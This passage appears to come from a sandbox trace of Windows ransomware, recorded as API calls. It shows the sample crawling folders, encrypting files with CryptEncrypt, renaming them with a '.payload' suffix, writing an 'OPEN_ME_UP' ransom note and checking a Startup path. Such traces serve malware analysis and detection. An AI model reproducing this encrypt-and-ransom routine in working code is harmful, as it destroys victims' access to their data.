lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.487] GetProcessHeap () returned 0x5e0000 [0058.487] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.487] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.487] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.487] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.487] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.487] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.487] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.487] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 49 [0058.487] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.487] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.487] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.487] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.487] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.488] GetTickCount () returned 0x114f0f9 [0058.488] GetTickCount () returned 0x114f0f9 [0058.488] GetTickCount () returned 0x114f0f9 [0058.488] GetTickCount () returned 0x114f0f9 [0058.488] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.488] GetProcessHeap () returned 0x5e0000 [0058.488] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.488] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.490] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.490] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.490] GetProcessHeap () returned 0x5e0000 [0058.490] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.490] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.490] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.490] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.490] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.490] CloseHandle (hObject=0x438) returned 1 [0058.491] GetProcessHeap () returned 0x5e0000 [0058.491] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.492] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.492] GetProcessHeap () returned 0x5e0000 [0058.492] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.492] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.492] FindClose (in: hFindFile=0x6066e0 | out: hFindFile=0x6066e0) returned 1 [0058.492] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.492] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1030\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.493] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.494] CloseHandle (hObject=0x430) returned 1 [0058.494] GetProcessHeap () returned 0x5e0000 [0058.494] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.494] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1031", cAlternateFileName="")) returned 1 [0058.494] lstrcmpiW (lpString1="1031", lpString2="Windows") returned -1 [0058.494] lstrcmpiW (lpString1="1031", lpString2="$Recycle.bin") returned 1 [0058.494] lstrcmpiW (lpString1="1031", lpString2="System Volume Information") returned -1 [0058.494] lstrcmpiW (lpString1="1031", lpString2="Program Files") returned -1 [0058.494] lstrcmpiW (lpString1="1031", lpString2="Program Files (x86)") returned -1 [0058.494] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031") returned 30 [0058.494] lstrcmpW (lpString1="1031", lpString2=".") returned 1 [0058.495] lstrcmpW (lpString1="1031", lpString2="..") returned 1 [0058.495] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.495] GetProcessHeap () returned 0x5e0000 [0058.495] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.495] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\*") returned 32 [0058.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6065a0 [0058.495] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.495] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.495] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.495] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.495] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.495] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\.") returned 32 [0058.495] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.495] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.496] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.496] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.496] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.496] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.496] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.496] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\..") returned 33 [0058.496] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.496] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.496] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.496] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.496] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.496] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.496] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.496] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 39 [0058.496] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.496] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.496] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.496] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.496] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.496] GetTickCount () returned 0x114f108 [0058.496] GetTickCount () returned 0x114f108 [0058.496] GetTickCount () returned 0x114f108 [0058.496] GetTickCount () returned 0x114f108 [0058.496] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.497] GetProcessHeap () returned 0x5e0000 [0058.497] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.497] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xd5b, lpOverlapped=0x0) returned 1 [0058.498] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff2a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.498] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xd5b, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xd5b, lpOverlapped=0x0) returned 1 [0058.498] GetProcessHeap () returned 0x5e0000 [0058.498] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.498] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.498] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.498] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.498] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.499] CloseHandle (hObject=0x438) returned 1 [0058.500] GetProcessHeap () returned 0x5e0000 [0058.500] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.500] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.501] GetProcessHeap () returned 0x5e0000 [0058.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.501] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.502] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.502] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.502] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.502] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.502] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.502] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 48 [0058.502] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.502] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.502] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.502] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.502] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.502] GetTickCount () returned 0x114f108 [0058.502] GetTickCount () returned 0x114f108 [0058.502] GetTickCount () returned 0x114f108 [0058.502] GetTickCount () returned 0x114f108 [0058.502] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.502] GetProcessHeap () returned 0x5e0000 [0058.502] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.502] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.504] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.504] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.505] GetProcessHeap () returned 0x5e0000 [0058.505] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.505] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.505] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.505] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.505] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.505] CloseHandle (hObject=0x438) returned 1 [0058.565] GetProcessHeap () returned 0x5e0000 [0058.565] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.565] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.566] GetProcessHeap () returned 0x5e0000 [0058.566] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.566] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.566] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.566] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.566] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.566] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.566] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.566] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 49 [0058.566] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.566] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.566] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.566] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.566] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.567] GetTickCount () returned 0x114f147 [0058.567] GetTickCount () returned 0x114f147 [0058.567] GetTickCount () returned 0x114f147 [0058.567] GetTickCount () returned 0x114f147 [0058.567] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.567] GetProcessHeap () returned 0x5e0000 [0058.567] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.567] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.569] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.569] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.569] GetProcessHeap () returned 0x5e0000 [0058.569] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.569] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.569] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.569] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.569] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.570] CloseHandle (hObject=0x438) returned 1 [0058.571] GetProcessHeap () returned 0x5e0000 [0058.571] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.571] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: 